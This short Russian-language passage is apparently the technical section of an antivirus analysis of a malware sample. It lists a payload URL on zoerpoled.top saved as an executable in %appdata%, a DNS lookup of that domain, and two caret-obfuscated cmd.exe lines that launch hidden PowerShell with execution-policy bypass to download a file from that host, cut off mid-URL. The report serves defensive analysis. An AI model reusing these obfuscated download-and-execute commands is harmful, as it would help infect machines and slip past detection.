Техническая информация
- http://www.zoerpoled.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "P^oWE^RS^heLl^.E^xe^ ^-^EXe^C^U^ti^o^nPo^LIc^Y^ BYP^ass -NO^pro^fIL^e^ -^wINdOw^ST^Yle^ hIDd^en (^n^eW-O^bJ^e^Ct SY^S^TEM^.net.^WEB^clien^T)^.DowNlo^aDfi^Le(^'http://www.zoerp...
- DNS ASK zo###oled.top
- '<SYSTEM32>\cmd.exe' /c "P^oWE^RS^heLl^.E^xe^ ^-^EXe^C^U^ti^o^nPo^LIc^Y^ BYP^ass -NO^pro^fIL^e^ -^wINdOw^ST^Yle^ hIDd^en (^n^eW-O^bJ^e^Ct SY^S^TEM^.net.^WEB^clien^T)^.DowNlo^aDfi^Le(^'http://www.zoerp...' (со скрытым окном)